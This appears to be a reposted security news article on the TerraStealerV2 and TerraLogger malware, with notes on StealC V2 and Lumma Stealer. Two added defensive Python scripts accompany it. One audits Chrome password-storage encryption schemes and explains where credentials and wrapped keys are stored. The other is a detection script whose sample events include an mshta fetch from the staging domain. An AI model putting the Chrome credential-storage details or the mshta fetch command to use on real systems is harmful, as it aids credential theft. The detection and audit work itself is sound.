Cyber Web Spider Blog – News

Golden Chickens Deploy TerraStealerV2 to Steal Browser Credentials and Crypto Wallet Data

Posted on May 5, 2025 (updated May 10, 2025) By CWS

The threat actors known as Golden Chickens have been attributed to two new malware families dubbed TerraStealerV2 and TerraLogger, suggesting continued development efforts to fine-tune and diversify their arsenal.
“TerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information,” Recorded Future Insikt Group said. “TerraLogger, by contrast, is a standalone keylogger. It uses a common low-level keyboard hook to record keystrokes and writes the logs to local files.”
Golden Chickens, also known as TA4557 and Venom Spider, is the name given to a financially motivated threat actor linked to a notorious malware family called More_eggs. It is known to have been active since at least 2018, offering its warez under a malware-as-a-service (MaaS) model.
Campaigns distributing More_eggs involve spear-phishing emails that target hiring managers with fake resumes, allowing the attackers to steal confidential data. Other campaign waves have singled out professionals on LinkedIn with weaponized job offers to deliver the malware.
Recent attack chains documented by Arctic Wolf have used phishing emails as a ploy to lead recipients to an actor-controlled website from which they download a decoy resume. The "resume" is in fact a Windows Shortcut (.LNK) file that, in turn, uses a batch script to open a lure document while running JavaScript malware in the background.
The JavaScript payload acts as a conduit to deploy More_eggs_Dropper, a DLL file designed to launch another JavaScript malware called TerraLoader. TerraLoader is then used to decrypt and load More_eggs.

“The threat actor has demonstrated a continued investment in the development and maintenance of its backdoor infrastructure over time,” Arctic Wolf Labs said. “This is evidenced through sophisticated code obfuscation and code encryption, which improve its stealth and evasiveness against defenders.”
As of 2023, Golden Chickens has been attributed to an online persona known as badbullzvenom, an account believed to be operated jointly by individuals from Canada and Romania. Other malicious tools developed by the e-crime group include More_eggs lite (aka lite_more_eggs), VenomLNK, TerraLoader, and TerraCrypt.

Late last year, Zscaler ThreatLabz detailed new Golden Chickens-related activity involving a backdoor called RevC2 and a loader known as Venom Loader, both of which are delivered via a VenomLNK.
The latest findings from Recorded Future show that the threat actors are continuing to work on their offerings, releasing an updated version of their stealer malware that is capable of harvesting data from browsers, cryptocurrency wallets, and browser extensions.
TerraStealerV2 has been distributed in several formats, such as executable files (EXE), dynamic-link libraries (DLL), Windows Installer packages (MSI), and shortcut (LNK) files.
In all of these cases, the stealer payload is delivered as an OCX (OLE Control Extension) file that is retrieved from an external domain (“wetransfers[.]io”).
“While it targets the Chrome ‘Login Data’ database to steal credentials, it does not bypass Application Bound Encryption (ABE) protections introduced in Chrome updates after July 2024, indicating the malware code is outdated or still under development,” the cybersecurity company said.
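The ABE point above is worth checking on your own endpoints: a stealer that only knows the pre-ABE scheme can still read any password rows that remain under the old DPAPI-wrapped key. The script below is an added example written for this page (it is not Recorded Future's, Golden Chickens', or Chrome's code). It relies on Chrome-on-Windows behaviour that the article does not spell out: passwords live in the SQLite table `logins` (column `password_value`); blobs encrypted under the DPAPI-wrapped key start with `v10`, blobs under App-Bound Encryption start with `v20`; and the wrapped keys sit in the profile's `Local State` JSON under `os_crypt.encrypted_key` (base64, decoding to `DPAPI` + blob) and `os_crypt.app_bound_encrypted_key` (base64, decoding to `APPB` + blob). The database and Local State it reads are constructed in memory, with random filler in place of real ciphertext.

```python
"""Classify Chrome 'Login Data' password blobs as legacy (DPAPI-wrapped key)
or App-Bound Encrypted, and check which wrapped keys Local State carries.

Added example for this page; not Recorded Future's, Golden Chickens', or
Chrome's own code. Assumed (not stated on the page): logins.password_value
blobs start with b"v10" (legacy) or b"v20" (App-Bound); Local State holds
os_crypt.encrypted_key (b"DPAPI"+...) and os_crypt.app_bound_encrypted_key
(b"APPB"+...), both base64. Sample data below is constructed.
"""
import base64
import json
import os
import sqlite3


def classify_blob(blob: bytes) -> str:
    """Map one password_value blob to the protection scheme its prefix signals."""
    if blob.startswith(b"v20"):
        # Key is wrapped by Chrome's elevation service; user-context DPAPI alone
        # cannot unwrap it. This is the protection the page says TerraStealerV2
        # does not bypass.
        return "app_bound"
    if blob.startswith(b"v10"):
        # Key is wrapped with user-scope DPAPI: any process running as the user
        # can unwrap it, so a pre-ABE stealer succeeds on this row.
        return "dpapi_legacy"
    if not blob:
        return "empty"
    return "unknown"


def audit_login_data(conn: sqlite3.Connection) -> dict:
    """Count logins rows per scheme. Pass a *copy* of Login Data: a running
    Chrome keeps the live file locked."""
    counts: dict = {}
    for (blob,) in conn.execute("SELECT password_value FROM logins"):
        kind = classify_blob(bytes(blob or b""))
        counts[kind] = counts.get(kind, 0) + 1
    return counts


def audit_local_state(local_state_json: str) -> dict:
    """Report which wrapped keys the profile's Local State carries."""
    os_crypt = json.loads(local_state_json).get("os_crypt", {})

    def has_key(name: str, magic: bytes) -> bool:
        raw = os_crypt.get(name)
        return bool(raw) and base64.b64decode(raw).startswith(magic)

    return {
        "dpapi_key": has_key("encrypted_key", b"DPAPI"),
        "app_bound_key": has_key("app_bound_encrypted_key", b"APPB"),
    }


# ---- constructed sample data (not from a real profile) ----------------------

def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for Login Data: two legacy rows, one app-bound row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)"
    )
    # Real blobs are prefix + 12-byte nonce + ciphertext + 16-byte GCM tag;
    # everything after the prefix here is random filler.
    rows = [
        ("https://mail.example.test", "alice", b"v10" + os.urandom(12 + 24 + 16)),
        ("https://bank.example.test", "alice", b"v20" + os.urandom(12 + 24 + 16)),
        ("https://old.example.test", "bob", b"v10" + os.urandom(12 + 8 + 16)),
    ]
    conn.executemany("INSERT INTO logins VALUES (?, ?, ?)", rows)
    return conn


SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {
        "encrypted_key": base64.b64encode(b"DPAPI" + os.urandom(32)).decode(),
        "app_bound_encrypted_key": base64.b64encode(b"APPB" + os.urandom(32)).decode(),
    }
})


if __name__ == "__main__":
    print("logins by scheme:", audit_login_data(build_sample_db()))
    print("Local State keys:", audit_local_state(SAMPLE_LOCAL_STATE))
```

To run it against a real profile, copy `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data` and `%LOCALAPPDATA%\Google\Chrome\User Data\Local State` somewhere else first and pass `sqlite3.connect(copy_path)` to `audit_login_data`. Any rows still reported as `dpapi_legacy` are the ones a user-context stealer of TerraStealerV2's vintage could read without elevation.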

The data captured by TerraStealerV2 is exfiltrated to both Telegram and the domain “wetransfers[.]io.” The malware also leverages trusted Windows utilities, such as regsvr32.exe and mshta.exe, to evade detection.
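The regsvr32.exe/mshta.exe abuse described above is what a detection engineer would hunt for in process-creation telemetry. The script below is an added example written for this page, not Recorded Future's detection logic; it scores events that mirror Sysmon Event ID 1 fields (Image, CommandLine, ParentImage). The sample events are constructed, with made-up paths and user names; the only indicator taken from the page is the domain wetransfers[.]io, written undefanged as it would appear in logs.

```python
"""Flag process-creation events where regsvr32.exe or mshta.exe is used the
way the page describes for TerraStealerV2: registering an OCX/DLL dropped in a
user-writable location, or pulling content from a URL such as the staging domain.

Added example for this page; not Recorded Future's or Golden Chickens' code.
Events below are constructed in Sysmon Event ID 1 shape; paths are invented.
"""
import re

# Directories an unprivileged user can write to: a COM module registered from
# here was not put there by an administrator's installer.
USER_WRITABLE = re.compile(
    r"\\(AppData|Temp|ProgramData|Users\\Public)\\"
    r"|\\Users\\[^\\]+\\(Downloads|Desktop|Documents)\\",
    re.IGNORECASE,
)
URL_OR_SCRIPT = re.compile(r"\b(https?://|javascript:|vbscript:)", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
STAGING_DOMAINS = {"wetransfers.io"}  # from the page; extend with your own intel


def tokens(cmd: str) -> list:
    """Split a Windows command line, keeping quoted paths with spaces intact."""
    return [q or u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(ev: dict) -> list:
    """Return the reasons one event is suspicious (empty list if none)."""
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    parent = basename(ev.get("ParentImage", ""))
    reasons = []

    if image == "regsvr32.exe":
        if URL_OR_SCRIPT.search(cmd):
            reasons.append("regsvr32 given a URL or script argument")
        for tok in tokens(cmd):
            if tok.lower().endswith((".ocx", ".dll")) and USER_WRITABLE.search(tok):
                reasons.append(f"regsvr32 registering module from user-writable path: {tok}")
    elif image == "mshta.exe":
        if URL_OR_SCRIPT.search(cmd):
            reasons.append("mshta given a URL or script argument")
        for tok in tokens(cmd):
            if tok.lower().endswith(".hta") and USER_WRITABLE.search(tok):
                reasons.append(f"mshta running HTA from user-writable path: {tok}")
    else:
        return reasons  # only the two LOLBins named on the page are in scope

    cmd_l = cmd.lower()
    for dom in STAGING_DOMAINS:
        if dom in cmd_l:
            reasons.append(f"references known staging domain {dom}")
    # A script-host parent is only interesting once something else fired;
    # on its own it is far too common to alert on.
    if reasons and parent in SCRIPT_HOSTS:
        reasons.append(f"spawned by script host {parent}")
    return reasons


def scan(events) -> list:
    """Return (index, reasons) for every flagged event."""
    out = []
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            out.append((i, reasons))
    return out


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {   # OCX dropped to Temp and registered silently: flag
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Users\alice\AppData\Local\Temp\ctl.ocx"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # mshta fetching remote content from the staging domain: flag
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe https://wetransfers.io/init.hta",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
    },
    {   # vendor installer registering a control from Program Files: no flag
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"',
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # local HTA shipped with a product, launched by the user: no flag
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'mshta.exe "C:\Program Files\Vendor\wizard.hta"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(why))
```

The path heuristic is deliberately narrow (user-writable directories only) so that ordinary software installs do not trip it; the domain list is where you would plug in the current indicators from your threat-intel feed rather than the single domain quoted here.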
TerraLogger, also propagated as an OCX file, is engineered to record keystrokes. However, it does not include functionality for data exfiltration or command-and-control (C2) communication, suggesting it is either in early development or intended to be used together with another component of the Golden Chickens MaaS ecosystem.
“The current state of TerraStealerV2 and TerraLogger suggests that both tools remain under active development and do not yet exhibit the level of stealth typically associated with mature Golden Chickens tooling,” Recorded Future said.
“Given Golden Chickens’ history of developing malware for credential theft and access operations, these capabilities will likely continue to evolve.”
The disclosure comes amid the emergence of new stealer malware families such as Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer, which are designed to exfiltrate a wide range of sensitive information from their victims.

It also follows the discovery of an updated version of the StealC malware with support for a streamlined command-and-control (C2) communication protocol and the addition of RC4 encryption.
“The malware’s payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts,” Zscaler ThreatLabz said in a report published last week.

“A redesigned control panel provides an integrated builder that allows threat actors to customize payload delivery rules based on geolocation, hardware IDs (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing for credentials.”
The new 2.2.4 version (aka StealC V2), released in March 2025, has been observed being distributed via another malware loader called Amadey. The control panel also supports Telegram bot integration for sending notifications and allows customization of message formats.
“StealC V2 introduces improvements, such as enhanced payload delivery, a streamlined communications protocol with encryption, and a redesigned control panel that provides more targeted information collection,” Zscaler said.
It is not just StealC that has received an update. Cybersecurity researchers have also detected a revamped version of Lumma Stealer that is written in C++ and is distributed via the prevalent ClickFix social engineering technique when users search for cracked software, popular movies, or the latest music releases.
“LUMMAC.V2 is an infostealer malware that targets a wide range of applications, including browsers, crypto wallets, password managers, remote desktop applications, email clients, and instant messaging applications,” Google Security Operations said.
“It steals information such as credentials, logins, emails, personal and system details, screenshots, and cookies, subsequently sending this data over HTTP in a ZIP archive.”

Source: The Hacker News
